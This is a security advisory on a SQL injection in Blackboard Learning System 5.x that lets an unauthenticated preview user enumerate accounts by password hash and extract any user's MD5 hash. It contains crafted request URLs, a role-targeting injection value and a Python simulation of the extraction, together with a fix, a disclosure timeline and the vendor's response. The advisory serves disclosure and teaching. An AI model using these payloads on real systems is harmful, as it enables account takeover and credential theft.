Blackboard 5.x Password Retrieval Vulnerability
EXPLOIT
blackboard5_extract.pl
OVERVIEW
Through the exploitation of a SQL injection vulnerability it is possible for an
unauthenticated user to query the Blackboard user directory and:
- Enumerate users with a given password.
- Extract the MD5 password hash of any given user.
Blackboard Learning System 5.x, Level 1 and Level 2, is affected.
DESCRIPTION
Using the address book search feature to search for the keyword 'meow' will
generate the following request:
/bin/common/search.pl?action=RESULTS
&context=ADDRESSBOOK
&type=SEARCH
&operation=VIEW
&keyword=
&nav=my_addressbook
&course_id=_1_1
&keywordraw=meow
&by=lastname
The 'by' parameter is populated from an HTML form with one of two possible
values, last name or e-mail address. Generating a hand-made request with the
'by' parameter set to 'ruff' renders the following SQL error:
SELECT U.pk1, U.sos_id_pk2, U.firstname,
U.middlename, U.lastname, U.title,
U.email, U.user_id, U.job_title,
U.department, U.company, U.street_1,
U.street_2, U.city, U.state, U.zip_code,
U.country, U.b_phone_1, U.b_phone_2,
U.h_phone_1, U.h_phone_2, U.m_phone,
U.b_fax, U.h_fax, U.webpage, U.email_ind,
U.address_ind, U.work_ind, U.phone_ind
FROM users U
WHERE U.row_status = 0
AND U.available_ind = 'Y'
AND U.public_ind = 'Y'
AND U.system_role != 'z'
AND U.system_role != 'u'
AND upper(U.ruff) LIKE '%MEOW%'
ORDER BY U.lastname, U.firstname
The above error was generated because there is no field named 'ruff' in the
users table. Further experimentation reveals that the 'keywordraw' parameter
(MEOW here) is stripped of non-alphanumeric characters and upper-cased, so it
can carry neither quotes nor LIKE wildcards. The 'by' parameter, on the other
hand, is not filtered at all, allowing an attacker to control the SQL query from
'upper(U.' onward. By guessing the name of the field that stores user passwords
(passwd), an attacker is able to enumerate all users with specific characters
in their password. With some experimentation it quickly becomes apparent that
passwords are stored as MD5 hashes (very common); a 32-character hex digest
passes through the keyword filter untouched. It is now a trivial matter for an
attacker to generate a list of valid username and password combinations by
searching for users whose stored hash equals the MD5 of an easily guessable
password such as MD5("blackboard"), MD5("password"), or MD5("organization name").
It is also possible for an attacker to extract a specific user's hashed
password. Because the keyword is matched as a substring (LIKE '%...%'), this
is accomplished through the following steps:
- Search for all accounts that have the character 'a' in their hashed password.
- If the target user does not appear in this list then choose another
character (an MD5 hex digest uses only 0-9 and a-f), otherwise attempt to
narrow down the list by searching for all accounts with the sequence 'ab' in
their hashed password.
- If the target user does not appear in this list then choose another
sequence such as 'ac' or 'ad'.
- Continue this process until the entire 32-character hash is extracted.
This process is labor and time intensive when done by hand; however, it is
easily scripted. Attached is a sample password extractor script that requires
only some manual labor to start. The following is a brief synopsis of its usage:
- Determine the current session id from the current session-based cookie.
- Follow the above outlined steps to narrow the list of accounts containing
the target user to a single page.
- Modify the attached Perl script to contain the initial sequence
(ex: 'abcd') from the previous step and the session id.
- Uncomment the "work forward" lines in the script. Run.
- The script should automatically determine the forward half of the target
user's hashed password. So 'abcd' may become 'abcd12345678...'.
- Next, comment out the "work forward" lines and uncomment the "work
backwards" lines in the script. Run.
- The script should automatically determine the backward half of the target
user's hashed password. So 'abcd' may become '12345678...abcd'.
- The combination of the two halves is the entire extracted hashed password.
- At this point a dictionary or brute force attack can be utilized to determine
the target user's un-hashed password.
A valid account is not required to exploit the above-described vulnerabilities.
Most (all?) organizations have a "preview" button on the login screen allowing
anyone to login to a restricted version of the system. Preview users are not
given an interface to the address book. However, despite the fact that the
address book is "hidden" from preview users, it is not actually restricted. The
scripts required in exploitation are indeed accessible to the preview user
thereby opening the window of exploitation to any remote user.
On a final note, if an attacker can guess the codes that Blackboard uses for
system roles, it becomes possible to target attacks on important users such
as instructors and teaching assistants with the following query:
/bin/common/search.pl?action=RESULTS
&context=USERDIR
&type=SEARCH
&operation=VIEW
&keyword=meow
&keywordraw=
&by=passwd) LIKE \
'%%' AND U.system_role = 't' AND upper(U.passwd
Substituting the right role code for 't' in U.system_role = 't' is the key here.
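The whole chain described above, as an added Python example that is neither the advisory's blackboard5_extract.pl (which is not reproduced on this page) nor Blackboard's code: a constructed in-memory SQLite table stands in for the users table, build_query() rebuilds the query in the shape of the error output above (keywordraw filtered, by spliced in verbatim), users_with_password() does the MD5("password")-style enumeration, extract_hash() runs the forward-then-backward substring extraction from the steps above, and role_payload() produces the 'by' value of the role-targeting request just shown. The user ids, plaintext passwords and the role codes 'n' and 't' are made up; only column names from the error output are used, with the SELECT list abbreviated to user_id.

```python
import hashlib
import sqlite3

HEX = "0123456789abcdef"   # alphabet of an MD5 hex digest
HASH_LEN = 32


def md5hex(plaintext: str) -> str:
    return hashlib.md5(plaintext.encode()).hexdigest()


def build_query(by: str, keywordraw: str) -> str:
    """Rebuild the server-side query in the shape shown by the error above.

    'keywordraw' is stripped of non-alphanumerics and upper-cased, so it can
    carry neither quotes nor LIKE wildcards; 'by' is interpolated verbatim,
    which is the injection point.  The SELECT list is abbreviated.
    """
    keyword = "".join(ch for ch in keywordraw if ch.isalnum()).upper()
    return (
        "SELECT U.user_id FROM users U "
        "WHERE U.row_status = 0 AND U.available_ind = 'Y' "
        "AND U.public_ind = 'Y' AND U.system_role != 'z' "
        "AND U.system_role != 'u' "
        f"AND upper(U.{by}) LIKE '%{keyword}%' "
        "ORDER BY U.lastname, U.firstname"
    )


def make_db() -> sqlite3.Connection:
    """Constructed sample directory (made-up users, passwords and role codes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id TEXT, lastname TEXT, firstname TEXT, "
        "passwd TEXT, system_role TEXT, row_status INTEGER, "
        "available_ind TEXT, public_ind TEXT)"
    )
    sample = [  # (user_id, lastname, firstname, plaintext, system_role)
        ("aadams", "Adams", "Alice", "password", "n"),
        ("bbrown", "Brown", "Bob", "blackboard", "n"),
        ("cclark", "Clark", "Carol", "Tr0ub4dor&3", "t"),
        ("ddavis", "Davis", "Dave", "password", "u"),  # role 'u': never listed
    ]
    for uid, ln, fn, plain, role in sample:
        conn.execute("INSERT INTO users VALUES (?,?,?,?,?,0,'Y','Y')",
                     (uid, ln, fn, md5hex(plain), role))
    return conn


def search(conn: sqlite3.Connection, by: str, keywordraw: str) -> list[str]:
    """The attacker's oracle: user ids the server returns for a crafted request."""
    return [row[0] for row in conn.execute(build_query(by, keywordraw))]


def users_with_password(conn: sqlite3.Connection, plaintext: str) -> list[str]:
    """Enumerate accounts whose stored hash is MD5(plaintext)."""
    return search(conn, "passwd", md5hex(plaintext))


def _grow(conn: sqlite3.Connection, target: str, h: str, forward: bool) -> str:
    """Extend h one hex digit at a time while target stays in the result set."""
    while len(h) < HASH_LEN:
        for c in HEX:
            cand = h + c if forward else c + h
            if target in search(conn, "passwd", cand):
                h = cand
                break
        else:  # no digit extends h: it now sits at the end (or start) of the hash
            break
    return h


def extract_hash(conn: sqlite3.Connection, target: str, seed: str) -> str:
    """Recover target's full hash from a seed substring: forward, then backward.

    The forward pass can only stall once h is a suffix of the hash, so the
    backward pass finishes the job without backtracking.
    """
    h = seed.lower()
    if target not in search(conn, "passwd", h):
        raise ValueError("seed is not a substring of the target's hash")
    h = _grow(conn, target, h, forward=True)
    h = _grow(conn, target, h, forward=False)
    if len(h) != HASH_LEN:
        raise ValueError("extraction stalled at %d characters" % len(h))
    return h


def role_payload(role: str) -> str:
    """'by' value that also pins system_role, as in the request above."""
    return f"passwd) LIKE '%%' AND U.system_role = '{role}' AND upper(U.passwd"


if __name__ == "__main__":
    db = make_db()
    print(users_with_password(db, "password"))              # ['aadams']
    full = md5hex("blackboard")
    print(extract_hash(db, "bbrown", full[10:14]) == full)  # True
    print(search(db, role_payload("t"), ""))                 # ['cclark']
```

The forward pass can only stall when the recovered string occurs exactly once, as a suffix of the digest, so the backward pass completes it without backtracking. The seed does not have to be unique to the target; it only has to keep the target in the result set, which is what the manual narrowing step in the original script's usage establishes.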
LESSONS TO LEARN
- Usage of unfiltered user-provided data within SQL queries is a common web
application programming error.
- Blocked and/or removed functionality should be enforced on the back end as
well as the front end.
- User authentication information should not be stored in the same table as
biographical information. Cross-table SQL injection tricks are more
difficult to find, and the authentication table should only be accessed when
authentication requires it.
- Suppress script failure debug outputs in production environments.
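As an added example of the first lesson (not Blackboard's hotfix, whose contents are not on this page), here is the same search query built the way it should have been: 'by' is mapped through an allow-list of the two fields the form offers, since a column name cannot be bound as a query parameter, and the keyword is bound as a parameter with its LIKE wildcards escaped so that a user can search for a literal '%' or '_'. Column names follow the error output above, with the SELECT list abbreviated to user_id; keyword_matches() evaluates the bound LIKE clause in SQLite without a table so the escaping can be checked on its own.

```python
import sqlite3

# search.pl's form only ever offers these two search fields, so anything else
# in 'by' is rejected outright instead of being spliced into the SQL.
ALLOWED_BY = {"lastname": "U.lastname", "email": "U.email"}


def like_pattern(keywordraw: str) -> str:
    """LIKE pattern for a user keyword with its wildcards escaped as literals."""
    kw = keywordraw.upper()
    for ch in ("\\", "%", "_"):          # backslash first, then the wildcards
        kw = kw.replace(ch, "\\" + ch)
    return "%" + kw + "%"


def safe_build_query(by: str, keywordraw: str) -> tuple[str, tuple[str, ...]]:
    """Return (sql, params): column via allow-list, keyword as a bound parameter."""
    column = ALLOWED_BY.get(by)
    if column is None:
        raise ValueError(f"unsupported search field: {by!r}")
    sql = (
        "SELECT U.user_id FROM users U "
        "WHERE U.row_status = 0 AND U.available_ind = 'Y' "
        "AND U.public_ind = 'Y' AND U.system_role != 'z' "
        "AND U.system_role != 'u' "
        f"AND upper({column}) LIKE ? ESCAPE '\\' "
        "ORDER BY U.lastname, U.firstname"
    )
    return sql, (like_pattern(keywordraw),)


def keyword_matches(value: str, keywordraw: str) -> bool:
    """Evaluate the bound LIKE clause in SQLite (no table needed) to check escaping."""
    conn = sqlite3.connect(":memory:")
    row = conn.execute("SELECT upper(?) LIKE ? ESCAPE '\\'",
                       (value, like_pattern(keywordraw))).fetchone()
    return bool(row[0])


if __name__ == "__main__":
    print(safe_build_query("lastname", "meow"))
    try:
        safe_build_query("passwd) LIKE '%%' AND U.system_role = 't' AND upper(U.passwd", "")
    except ValueError as exc:
        print("rejected:", exc)
```

With 'by' reduced to a dictionary lookup, the injected role-targeting value above is refused before any SQL is assembled, and the keyword no longer depends on the non-alphanumeric stripping the original relied on.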
VENDOR NOTIFICATION
The Blackboard team was concerned, quick to respond, open to suggestions,
professional, and even took the time to teleconference. Overall I was very
impressed with their handling of the situation.
08/07/2002 - Vulnerability discovered.
08/08/2002 - My University contacted.
08/11/2002 - First contact with David Yaskin at Blackboard.
08/30/2002 - Patch test with my University.
09/01/2002 - Fix made available and announcement made to Blackboard community.
01/21/2003 - Public release.
VENDOR RESPONSE
A security hotfix is now available through Blackboard that will address recently
identified issues related to the Blackboard User Directory. Although there have
been no reported security breaches, Blackboard would like to share this
important information with clients. For locally installed clients running on
release 5.5.1 or later (including Blackboard Learning System - ML), the
recommended solution is to obtain the hotfix by calling Blackboard Product
Support at 1-888-788-5264 or by submitting a service request ticket through the
Blackboard Product Support Web site. For locally installed clients running on
releases earlier than 5.5.1, the recommended solution is to upgrade to 5.5.1 and
then apply the hotfix. To upgrade to release 5.5.1, system administrators can go
to http://behind.blackboard.com and click on the "Hotfixes and Updates" icon to
obtain the download. Once release 5.5.1 has been installed, you may obtain the
hotfix by calling Blackboard Product Support at 1-888-788-5264 (+1-202-715-6019
for international clients); or by submitting a service request ticket through
the Blackboard Product Support Web site.
For all Learning System and Learning and Community Portal System (formerly
Blackboard 5 Level Three) clients running on releases earlier than 5.5.1, please
contact your Account Manager, at 202-463-4860 prior to upgrading.
UNAFFECTED: Clients who are using our Enterprise product capability of
completely externalizing external authentication, and have implemented
Blackboard Learning System, Level 3 using LDAP, Kerberos, Active Directory, or
Active Directory are unaffected.
Clients running on Blackboard CourseInfo need not take action at this time, as
the potential security vulnerability does not affect this platform.
Clients running on the Blackboard Transaction System are unaffected.
WHAT IS BLACKBOARD?
Blackboard offers a complete suite of enterprise software products and services
that power a total "e-Education Infrastructure" for schools, colleges,
universities, and other education providers.
Blackboard offers a suite of products. This article refers specifically to the
Blackboard Learning System 5.x, Level 1 and 2. If you are using the Enterprise
product capability of completely externalizing authentication, you are not
affected.
THANKS
Thanks go to Ralph Schindler for aiding me in this research,
and David Yaskin at Blackboard for his time and commitment.